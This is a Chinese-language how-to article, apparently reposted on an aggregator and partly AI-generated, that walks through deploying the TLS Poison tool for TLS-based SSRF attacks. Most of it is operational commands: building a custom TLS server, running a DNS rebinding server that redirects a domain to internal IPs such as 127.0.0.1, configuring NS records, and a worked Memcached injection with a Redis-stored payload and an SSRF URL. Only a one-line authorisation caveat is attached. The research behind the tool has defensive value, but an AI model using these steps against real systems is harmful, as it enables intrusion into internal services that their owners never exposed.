终极指南:如何使用TLS Poison实现通用TLS SSRF攻击
终极指南如何使用TLS Poison实现通用TLS SSRF攻击【免费下载链接】TLS-poison项目地址: https://gitcode.com/gh_mirrors/tl/TLS-poisonTLS Poison是一款强大的工具它允许通过TLS实现通用的SSRF攻击以及在大多数浏览器中通过图像标签实现CSRF攻击。其目标与SNI注入类似但这种新方法利用了TLS的固有行为而非依赖特定实现中的漏洞。 什么是TLS PoisonTLS Poison最初在Blackhat USA 2020和DEF CON Safemode上被提出它主要基于rustls和dns-mitm项目开发通过TLS会话持久性来实现攻击。 攻击原理TLS Poison的核心原理是利用TLS的会话持久性和DNS重绑定技术。当目标系统发起HTTPS请求时TLS Poison会先建立一个正常的TLS连接然后通过DNS重绑定将域名解析到内部服务同时复用之前建立的TLS会话从而将恶意 payload 发送到内部服务。 准备工作在开始使用TLS Poison之前你需要准备以下环境一个可以设置NS记录的域名两台公共服务器分别用于TLS服务器和DNS重绑定服务器基本的Linux命令行操作能力 安装步骤1. 克隆仓库首先克隆TLS Poison仓库到你的服务器git clone https://link.gitcode.com/i/c027f894212a1861ac69affcc460acca.git2. 部署TLS服务器TLS服务器需要部署在公共网络上最终DNS重绑定服务器会将域名解析到这里。# 安装依赖 sudo apt install git redis # 安装Rust curl --proto https --tlsv1.2 -sSf https://sh.rustup.rs | sh cd TLS-poison/client-hello-poisoning/custom-tls # 编译 cargo build # 测试服务器 target/debug/custom-tls -p 8443 --verbose --certs ../../rustls/test-ca/rsa/end.fullchain --key ../../rustls/test-ca/rsa/end.rsa http在另一个终端中验证设置curl -kv https://localhost:84433. 部署DNS重绑定服务器DNS重绑定服务器也需要部署在公共网络上建议与TLS服务器分开部署。sudo apt install python3 python3-pip cd TLS-poison/client-hello-poisoning/custom-dns pip3 install -r requirements.txt # 启动DNS重绑定服务器 # $DOMAIN: 你拥有的域名 # $TARGET_IP: 目标内部服务IP通常是127.0.0.1 # $INITIAL_IP: TLS服务器的IP sudo python3 alternate-dns.py $DOMAIN,$TARGET_IP -b 0.0.0.0 -t $INITIAL_IP -d 8.8.8.8如果遇到OSError: address already in use错误可以停止systemd-resolved服务sudo systemctl stop systemd-resolved验证DNS重绑定是否正常工作dig localhost $DOMAIN4. 设置NS记录和证书你需要设置NS记录和胶水记录使DNS请求指向你的重绑定服务器。例如如果你的域是example.com应添加dns.example.com A 300 DNS_IP tlstest.example.com NS 300 dns.example.com然后获取TLS证书# 使用certbot获取证书 # 参考certbot DNS instructions完成DNS挑战 # 重新启动TLS服务器 target/debug/custom-tls -p 8443 --verbose --certs letsencrypt-cert.fullchain --key letsencrypt-key.rsa http 实施攻击针对Memcached的攻击示例设置攻击 payloadredis-cli 127.0.0.1:6379 set payload \r\nset foo 0 0 14\r\nim in ur cache \r Ctrlc启动TLS服务器监听Memcached端口11211target/debug/custom-tls -p 11211 --verbose --certs ../../rustls/test-ca/rsa/end.fullchain --key ../../rustls/test-ca/rsa/end.rsa http使用以下URL作为SSRF payloadhttps://tlstest.example.com:11211⚠️ 注意事项攻击前确保获得合法授权不同软件对TLS会话持久性的处理不同可能需要调整sleep参数对于Chrome等浏览器sleep时间可能需要设置得较短如果遇到重定向次数限制可以增加sleep时间至59000ms或更长 相关资源项目源码TLS-poisonTLS服务器代码client-hello-poisoning/custom-tls/src/main.rsDNS重绑定服务器代码client-hello-poisoning/custom-dns/alternate-dns.py通过本指南你应该能够理解并使用TLS Poison工具来实现通用的TLS SSRF攻击。记住网络安全工具应仅用于合法的安全测试和研究目的。【免费下载链接】TLS-poison项目地址: https://gitcode.com/gh_mirrors/tl/TLS-poison创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

相关新闻

主流户外净水器选择:适配度、证据与风险的工程化对比框架

主流户外净水器选择:适配度、证据与风险的工程化对比框架

户外净水器品类繁多,从吸管式到泵式、重力式、紫外线式,用户常陷入参数对比的迷雾。本文从适配度(系统匹配)、证据链(过滤性能验证)、风险暴露(使用场景下的失效模式)三个维度构建对…

2026/7/27 15:28:11 阅读更多 →
TCN-Transformer混合模型在时序预测中的工程实践

TCN-Transformer混合模型在时序预测中的工程实践

1. TCN-Transformer混合模型的核心设计理念 时序数据预测一直是工业界和学术界共同关注的难题。传统方法如ARIMA、XGBoost等在简单场景下表现尚可,但当面对复杂的时间依赖关系时,它们的局限性就暴露无遗。我在处理电力负荷预测项目时,就深刻体…

2026/7/27 15:27:11 阅读更多 →
掌握流放之路交易艺术:Awakened PoE Trade终极指南

掌握流放之路交易艺术:Awakened PoE Trade终极指南

掌握流放之路交易艺术:Awakened PoE Trade终极指南 【免费下载链接】awakened-poe-trade :heavy_dollar_sign: :hammer: Path of Exile app for price checking 项目地址: https://gitcode.com/gh_mirrors/aw/awakened-poe-trade 在《流放之路》的复杂经济体…

2026/7/27 15:27:11 阅读更多 →

最新新闻

深入解析DP83630以太网PHY寄存器配置与调试实战

深入解析DP83630以太网PHY寄存器配置与调试实战

1. 项目概述与核心价值搞嵌入式网络通信,尤其是工业控制和交换机这类对稳定性和实时性要求高的场景,你肯定绕不开以太网PHY芯片。这东西就像是网络世界的“翻译官”和“信号兵”,负责把MAC层送过来的数字信号,变成能在网线上跑的模…

2026/7/27 15:37:16 阅读更多 →
Go语言Context取消机制解析与实战应用

Go语言Context取消机制解析与实战应用

1. Go Context 取消信号传播机制解析在Go语言并发编程中,Context就像一位经验丰富的交通警察,它通过一套精巧的信号传递系统,协调着成千上万个goroutine的有序运行和及时撤离。这套机制的核心价值在于:当上游任务需要取消时&#…

2026/7/27 15:37:15 阅读更多 →
说说什么是API网关,他有什么作用?

说说什么是API网关,他有什么作用?

面试

2026/7/27 15:37:15 阅读更多 →
JAVA中的注解原理是什么?

JAVA中的注解原理是什么?

面试 注解本身就是一个标记,用于给代码增添说明信息,可用于类,方法,字段上等,注解不影响程序本身的逻辑执行,但可以通过工具,或者框架对这些信息进行特殊处理,如代码生成&#xff0c…

2026/7/27 15:37:15 阅读更多 →
IPython Kernel安全最佳实践:ZMQ Curve加密配置与漏洞防范

IPython Kernel安全最佳实践:ZMQ Curve加密配置与漏洞防范

IPython Kernel安全最佳实践:ZMQ Curve加密配置与漏洞防范 【免费下载链接】ipykernel IPython Kernel for Jupyter 项目地址: https://gitcode.com/gh_mirrors/ip/ipykernel IPython Kernel作为Jupyter生态系统的核心组件,负责执行用户代码并与前…

2026/7/27 15:37:15 阅读更多 →
TLS Poison vs SNI注入:为什么TLS固有行为是更强大的攻击向量

TLS Poison vs SNI注入:为什么TLS固有行为是更强大的攻击向量

TLS Poison vs SNI注入:为什么TLS固有行为是更强大的攻击向量 【免费下载链接】TLS-poison 项目地址: https://gitcode.com/gh_mirrors/tl/TLS-poison TLS Poison是一种利用TLS固有行为实现通用SSRF和CSRF的强大工具,与依赖特定实现漏洞的SNI注入…

2026/7/27 15:36:15 阅读更多 →

日新闻

【JAVA毕设源码分享】基于SpringBoot的社区智能垃圾管理系统的设计与实现(程序+文档+代码讲解+一条龙定制)

【JAVA毕设源码分享】基于SpringBoot的社区智能垃圾管理系统的设计与实现(程序+文档+代码讲解+一条龙定制)

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

2026/7/27 0:00:54 阅读更多 →
SPI实战指南:从时钟模式到寄存器配置,解决嵌入式通信难题

SPI实战指南:从时钟模式到寄存器配置,解决嵌入式通信难题

1. 项目概述:从寄存器手册到实战指南 如果你手头有一份类似德州仪器(TI)TMS320x240xA系列DSP的SPI模块技术手册,看着里面密密麻麻的寄存器位定义、时序图和公式,是不是感觉头大?这份资料虽然权威&#xff0…

2026/7/27 0:00:54 阅读更多 →
【JAVA毕设源码分享】基于springboot的水果购物管理系统的设计与实现(程序+文档+代码讲解+一条龙定制)

【JAVA毕设源码分享】基于springboot的水果购物管理系统的设计与实现(程序+文档+代码讲解+一条龙定制)

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

2026/7/27 0:00:54 阅读更多 →

周新闻

深度学习道路桥梁裂缝检测系统 道路桥梁裂缝检测数据集 道路桥梁病害识别检测数据集

深度学习道路桥梁裂缝检测系统 道路桥梁裂缝检测数据集 道路桥梁病害识别检测数据集

深度学习道路桥梁裂缝检测系统 数据集6000张 完整源码已标注数据集训练好的模型环境配置教程程序运行说明文档,可以直接使用!系统支持图片、视频、摄像头等多种方式检测裂缝,功能强大实用。 1数据集6000张 8各类别

2026/7/27 4:33:59 阅读更多 →
深度学习YOLO模型如何训练 PUBG 绝地求生目标检测数据集

深度学习YOLO模型如何训练 PUBG 绝地求生目标检测数据集

pubg数据集 精选原图1.42万数据 1.49万标签 无任何重复、算法增强或冗余图像! pubg绝地求生目标检测数据集 1分类:e_body,14905个标签,txt格式 共计14244张图,99%为640*640尺寸图像 适合yolo目标检测、AI训练关键词&am…

2026/7/27 6:31:56 阅读更多 →
Apex英雄目标检测数据集 深度学习框架YOLO如何训练APEX数据集

Apex英雄目标检测数据集 深度学习框架YOLO如何训练APEX数据集

Apex检测数据集数据集详情检测类别: allies enemy tag图片总量:7247张训练集:5139张验证集:1425张测试集:683张标注状态:全部已标注,即拿即用数据格式:支持YOLO格式及其他格式&#…

2026/7/27 4:01:12 阅读更多 →

月新闻